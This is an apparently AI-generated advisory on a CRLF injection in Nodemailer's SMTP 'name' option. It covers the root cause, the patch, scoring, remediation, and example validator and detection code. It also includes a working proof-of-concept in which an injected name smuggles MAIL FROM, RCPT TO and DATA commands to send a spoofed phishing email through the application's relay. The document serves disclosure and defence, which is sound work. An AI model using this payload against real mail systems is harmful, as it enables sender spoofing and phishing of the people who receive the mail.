CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.


© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad




GHSA-VVJJ-XCJG-GR5G: SMTP Command Injection via CRLF in Nodemailer

Amit Schendel
Senior Security Researcher

Apr 8, 2026 · 5 min read

PoC Available

Executive Summary (TL;DR)

A CRLF injection flaw in Nodemailer's SMTP connection logic lets an attacker who controls the transport's name option inject arbitrary SMTP commands into the EHLO/HELO handshake, turning the application's mail relay into a vehicle for sender spoofing and phishing. Fixed in version 8.0.5.

Nodemailer versions up to and including 8.0.4 contain an SMTP command injection vulnerability caused by improper neutralization of CRLF sequences in the transport name configuration option. Because the value is written to the socket unmodified, embedded line breaks let an attacker append arbitrary SMTP commands to the initial handshake.

Vulnerability Overview

Nodemailer is a widely deployed Node.js module used for sending emails. Versions 8.0.4 and earlier contain a vulnerability in the handling of the transport name configuration option. This option identifies the client to the SMTP server during the initial handshake phase.

The vulnerability is classified as CWE-93, Improper Neutralization of CRLF Sequences. An attacker who controls the name parameter can inject arbitrary SMTP commands into the connection stream. The injection point is the greeting command: EHLO for ESMTP, HELO for the plain SMTP fallback, and LHLO when the transport is configured for LMTP.

Exploitation requires that the application expose the SMTP transport configuration to untrusted input. When it does, the attacker's raw protocol commands are executed inside the greeting, before any of the application's own MAIL FROM, RCPT TO, and DATA commands reach the server.

Root Cause Analysis

The root cause resides in the lib/smtp-connection/index.js file. During connection initialization, the library assigns the name property directly from the user-provided configuration object or a default hostname helper. The library does not strip or sanitize carriage return and line feed (CRLF) characters from this value.

When establishing the session, the library constructs the greeting command by concatenating the command verb with the unsanitized name property. The _sendCommand internal method appends a terminating CRLF sequence and writes the buffer to the socket. Because the library does not neutralize CRLF sequences inside the value, the SMTP server treats each embedded line break as a command delimiter and processes every line that follows as a separate command.

The unsanitized parameter propagates into the EHLO, HELO, and LHLO commands. Because an SMTP client must re-send EHLO after STARTTLS upgrades the connection, the injection fires a second time on the encrypted leg of the session, so the parameter is an injection vector both in cleartext and after TLS negotiation.

Code Analysis

The vulnerability is evident in the assignment logic for the connection identifier. The vulnerable implementation reads the name property without prior validation or sanitization.

// Vulnerable Implementation (lib/smtp-connection/index.js)
this.name = this.options.name || this._getHostname();

The patch introduced in commit 0a43876801a420ca528f492eaa01bfc421cc306e mitigates this issue by enforcing a strict sanitization step. The developers utilized a regular expression to strip all carriage return and line feed characters during assignment.

// Patched Implementation (lib/smtp-connection/index.js)
this.name = (this.options.name || this._getHostname()).toString().replace(/[\r\n]+/g, '');

This fix ensures that regardless of the input provided to the transport configuration, the resulting name property is a single logical line. The SMTP protocol relies strictly on CRLF sequences for command termination, so stripping those characters removes the command injection vector entirely. Two details are worth noting: the added toString() call also guards against non-string configuration values, and the fix strips rather than rejects, so a malicious value still reaches the server as one long, malformed EHLO argument. The server may answer that with a syntax error and the session may fail loudly, but no second command can be smuggled in.

Exploitation

Exploitation requires the attacker to control the name property within the SMTP transport configuration. This prerequisite restricts the attack surface primarily to multi-tenant SaaS platforms that let tenants supply their own SMTP profile, administrative panels, and environments where configuration values are populated dynamically from untrusted sources. Once the configuration is controlled, the attacker crafts a payload containing malicious SMTP commands separated by \r\n sequences.

// Proof of concept (Nodemailer <= 8.0.4): the attacker-controlled name carries a
// complete SMTP transaction separated by CRLF. The trailing RSET is terminated by
// the CRLF that _sendCommand appends to the EHLO line.
const nodemailer = require('nodemailer');

const transport = nodemailer.createTransport({
    host: 'smtp.target-server.com',
    port: 25,
    secure: false,
    name: 'legit.host\r\nMAIL FROM:<attacker@evil.com>\r\n'
        + 'RCPT TO:<victim@target.com>\r\nDATA\r\n'
        + 'From: ceo@company.com\r\nTo: victim@target.com\r\n'
        + 'Subject: Urgent\r\n\r\nPhishing content\r\n.\r\nRSET'
});

// Any send by the application triggers the handshake, and with it the injection.
transport.sendMail({ from: 'app@company.com', to: 'user@company.com',
                     subject: 'Legit', text: 'Legitimate message' });

When the application attempts to send an email, the injected sequence executes before the legitimate payload. The EHLO line is effectively terminated after legit.host, and the subsequent MAIL FROM, RCPT TO, and DATA commands are processed by the receiving server as separate commands. The attacker ends the payload with RSET (or a similar command) so that the CRLF the library appends completes a well-formed final command and the server's transaction state is reset before the library's own commands follow. Two practical caveats apply. First, EHLO precedes AUTH, so the injected commands always run unauthenticated: they succeed against relays that authorize by source IP or network, which is the common internal-relay setup, but an authentication-only relay will reject the injected MAIL FROM. Second, the injected commands produce extra server replies that the client's lockstep response handling does not expect, so the application's own send commonly fails afterwards, by which point the injected message has already been accepted.
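To make the root cause from the Code Analysis section and the exploitation above concrete, here is an added example (not Nodemailer's code, and not from the advisory): a deliberately simplified re-implementation of how the EHLO line is framed, with the vulnerable and the patched assignment side by side, followed by a parser that splits the bytes on CRLF the way an SMTP server does. The 'localhost' fallback stands in for the library's _getHostname() helper, and the payload is the constructed one from the PoC.

```javascript
// Added example, not Nodemailer's code: a simplified re-implementation of the
// EHLO framing, used to show what an SMTP server receives with and without
// the 8.0.5 fix. 'localhost' stands in for the library's _getHostname() helper.
const CRLF = '\r\n';

// Vulnerable assignment: the configured name is used verbatim.
function nameVulnerable(options) {
  return options.name || 'localhost';
}

// Patched assignment (same regex as the fix): every CR and LF is stripped.
function namePatched(options) {
  return (options.name || 'localhost').toString().replace(/[\r\n]+/g, '');
}

// Client-side framing: verb, one space, argument, terminating CRLF.
function frameCommand(verb, argument) {
  return `${verb} ${argument}${CRLF}`;
}

// Server-side view: SMTP delimits commands on CRLF, so split there. The
// trailing CRLF yields one empty element, which is dropped; interior empty
// lines are kept because the blank line inside DATA separates headers from body.
function serverCommands(bytes) {
  const lines = bytes.split(CRLF);
  if (lines[lines.length - 1] === '') lines.pop();
  return lines;
}

// Constructed payload with the same shape as the PoC above.
const payloadName =
  'legit.host\r\nMAIL FROM:<attacker@evil.com>\r\n' +
  'RCPT TO:<victim@target.com>\r\nDATA\r\n' +
  'From: ceo@company.com\r\nTo: victim@target.com\r\n' +
  'Subject: Urgent\r\n\r\nPhishing content\r\n.\r\nRSET';

// Frame EHLO with the given name resolver and return the commands the server sees.
function ehloAsSeenByServer(name, resolveName) {
  return serverCommands(frameCommand('EHLO', resolveName({ name })));
}

const vulnerable = ehloAsSeenByServer(payloadName, nameVulnerable);
const patched = ehloAsSeenByServer(payloadName, namePatched);

// Vulnerable: 11 lines, the first being EHLO and the last RSET, so the server
// runs a full MAIL FROM / RCPT TO / DATA transaction inside the greeting.
console.log(vulnerable.length, vulnerable[0], vulnerable[vulnerable.length - 1]);
// Patched: a single EHLO line whose argument is garbage but cannot be split.
console.log(patched.length, patched[0]);
```

The patched output illustrates the caveat from the Code Analysis section: the server still receives a malformed hostname argument and may reject the greeting, but it receives exactly one command.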

Impact Assessment

The primary impact of this vulnerability is unauthorized email transmission and sender spoofing. By injecting raw SMTP commands, an attacker bypasses the application's intended restrictions on recipient addresses and message content. The attacker leverages the legitimate application's authorized SMTP relay to distribute malicious content.

Because the injected message leaves the organization's own relay, it inherits that relay's domain reputation, its Sender Policy Framework (SPF) authorization, and any DomainKeys Identified Mail (DKIM) signature the relay applies. Receiving servers therefore treat the spoofed email as legitimately originating from the compromised application's infrastructure, which is precisely what SPF and DKIM are meant to assert.

The CVSS v3.1 score for this vulnerability is 4.9 (Moderate). The score is held down by the high privileges required (PR:H) to influence the application's internal SMTP configuration. Confidentiality and availability are unaffected (C:N, A:N), while the integrity impact is high (I:H) because the attacker gains full control over the SMTP command stream the application emits.

Remediation

The vulnerability is fully resolved in Nodemailer version 8.0.5. Organizations utilizing Nodemailer must upgrade their dependencies to this version or later to ensure the name parameter is correctly sanitized. No configuration changes are required to activate the patch.

If immediate patching is not feasible, developers must implement strict input validation on any user-supplied data used in the SMTP transport configuration. The validation logic must reject, not merely strip, any string containing a carriage return (\x0d) or line feed (\x0a). The application should enforce a strict allowlist of characters for the name parameter: alphanumeric characters, hyphens, and periods for hostnames, plus square brackets and colons only if address literals such as [192.0.2.10] must be supported.
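The following is an added example of such a guard (not Nodemailer's code and not part of the advisory): it validates an untrusted SMTP client name before it is copied into the options object passed to nodemailer.createTransport(). It rejects CR, LF and every other control character outright, then requires a hostname or an RFC 5321 address literal. Accepting address literals goes slightly beyond the alphanumeric/hyphen/period allowlist above and is a design choice; the host and port values in buildTransportOptions are assumptions for illustration.

```javascript
// Added example, not Nodemailer's code: validate an untrusted SMTP client name
// before it reaches createTransport(). Rejects rather than sanitizes, because a
// name containing CR/LF is an attack, not a typo.

// Hostname: 1..253 chars total, labels of 1..63 chars, alphanumeric plus
// interior hyphens, separated by periods.
const HOSTNAME_RE =
  /^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$/i;

// Address literal (RFC 5321): dotted IPv4, or "IPv6:" plus hex groups, in brackets.
// Going beyond the page's allowlist here is a design choice; drop it if not needed.
const ADDRESS_LITERAL_RE = /^\[(?:\d{1,3}(?:\.\d{1,3}){3}|IPv6:[0-9a-f:.]+)\]$/i;

// Control characters (including \x0d and \x0a) are never legitimate in a name.
const CONTROL_CHARS_RE = /[\x00-\x1f\x7f]/;

function validateSmtpClientName(value) {
  if (typeof value !== 'string') {
    throw new TypeError('SMTP client name must be a string');
  }
  if (CONTROL_CHARS_RE.test(value)) {
    throw new Error('SMTP client name contains control characters');
  }
  if (!HOSTNAME_RE.test(value) && !ADDRESS_LITERAL_RE.test(value)) {
    throw new Error('SMTP client name is not a hostname or address literal');
  }
  return value;
}

// Build the options object for nodemailer.createTransport() from tenant-supplied
// values. Port and TLS settings are assumptions for illustration; `name` is the
// field this advisory concerns and is validated before being copied in.
function buildTransportOptions(host, untrustedName) {
  return {
    host,
    port: 587,
    secure: false,
    requireTLS: true,
    name: validateSmtpClientName(untrustedName),
  };
}

// Constructed inputs: a legitimate tenant hostname and the PoC payload.
const good = buildTransportOptions('smtp.example.net', 'mail.tenant-a.example');
console.log('accepted:', good.name);
try {
  buildTransportOptions('smtp.example.net', 'legit.host\r\nMAIL FROM:<attacker@evil.com>');
} catch (err) {
  console.log('rejected:', err.message);
}
```

Run the validator at the trust boundary (the request handler or settings form that stores the tenant's SMTP profile), not only at send time, so a hostile value never persists in configuration.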

Security teams should monitor outbound SMTP traffic for unusual patterns. More than one CRLF-terminated command inside the single write that carries EHLO or HELO is an indicator of attempted command injection, since a well-behaved client cannot legitimately pipeline anything with its greeting (it does not learn that the server supports PIPELINING until the EHLO reply arrives). Network IDS and SMTP-aware inspection tools can alert on this condition; note that the EHLO repeated after STARTTLS travels inside TLS, so passive inspection sees only the cleartext greeting and the client's own transport logs are needed for the encrypted leg.
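As an added example of that detection logic (not from the advisory or any product), the function below inspects the client-to-server writes of a captured SMTP session and flags any write that begins with EHLO, HELO or LHLO and carries more than one CRLF-terminated line. Legitimate pipelining later in the session (MAIL FROM, RCPT TO and DATA in one write after the EHLO reply) is deliberately not flagged. Both sessions are constructed inputs; the injected one reuses the PoC payload.

```javascript
// Added example, not from the advisory or Nodemailer: a detection rule over the
// client side of a captured SMTP session. Each element of `clientWrites` is the
// payload of one TCP segment or socket write from client to server.
const CRLF = '\r\n';
const GREETING_VERBS = new Set(['EHLO', 'HELO', 'LHLO']);

// Split one write into its CRLF-terminated lines, dropping the trailing empty element.
function commandsInWrite(write) {
  const lines = write.split(CRLF);
  if (lines[lines.length - 1] === '') lines.pop();
  return lines;
}

// Returns one finding per suspicious write: its index, the greeting line, and
// every line that was smuggled into the same write behind it.
function detectHandshakeInjection(clientWrites) {
  const findings = [];
  clientWrites.forEach((write, index) => {
    const lines = commandsInWrite(write);
    if (lines.length === 0) return;
    const verb = lines[0].split(' ')[0].toUpperCase();
    if (!GREETING_VERBS.has(verb)) return;   // only the greeting is lockstep-only
    if (lines.length > 1) {
      findings.push({ writeIndex: index, greeting: lines[0], trailingLines: lines.slice(1) });
    }
  });
  return findings;
}

// Constructed benign session: one line in the greeting, pipelining afterwards.
const benignSession = [
  'EHLO mail.example.com\r\n',
  'MAIL FROM:<app@example.com>\r\nRCPT TO:<user@example.org>\r\nDATA\r\n',
  'Subject: Report\r\n\r\nbody\r\n.\r\n',
  'QUIT\r\n',
];

// Constructed injected session: the PoC payload rides inside the EHLO write.
const injectedSession = [
  'EHLO legit.host\r\nMAIL FROM:<attacker@evil.com>\r\nRCPT TO:<victim@target.com>\r\n' +
    'DATA\r\nFrom: ceo@company.com\r\nTo: victim@target.com\r\nSubject: Urgent\r\n\r\n' +
    'Phishing content\r\n.\r\nRSET\r\n',
  'MAIL FROM:<app@company.com>\r\n',
];

console.log(detectHandshakeInjection(benignSession).length);   // 0
console.log(detectHandshakeInjection(injectedSession));        // one finding at write 0
```

Feeding this the reassembled client stream from a packet capture, one element per segment, is enough for the cleartext greeting; for the post-STARTTLS EHLO the same rule can be applied to the client's own SMTP transcript log instead.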

Official Patches

Nodemailer Version 8.0.5 Release Notes

Technical Appendix

CVSS Score
4.9 / 10
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N

Affected Systems

  • Node.js applications using Nodemailer for SMTP transport
  • Multi-tenant SaaS platforms providing custom SMTP integrations

Affected Versions Detail

Product: Nodemailer (npm package nodemailer)
Affected Versions: <= 8.0.4
Fixed Version: 8.0.5

Attribute Summary

Vulnerability Type: CRLF Injection (Command Injection)
CWE ID: CWE-93
Attack Vector: Network
CVSS Score: 4.9
Impact: Integrity (Email Spoofing, Phishing Relays)
Exploit Status: PoC Available

MITRE ATT&CK Mapping

  • T1190 Exploit Public-Facing Application (Initial Access)
  • T1566 Phishing (Initial Access)

CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')

Vulnerability Timeline

  • 2026-04-07: Fix committed to Nodemailer repository
  • 2026-04-08: GitHub Advisory GHSA-VVJJ-XCJG-GR5G published
  • 2026-04-08: Nodemailer version 8.0.5 released

References & Sources

  • [1] GitHub Advisory GHSA-VVJJ-XCJG-GR5G
  • [2] Nodemailer Fix Commit
  • [3] Nodemailer v8.0.5 Release Notes
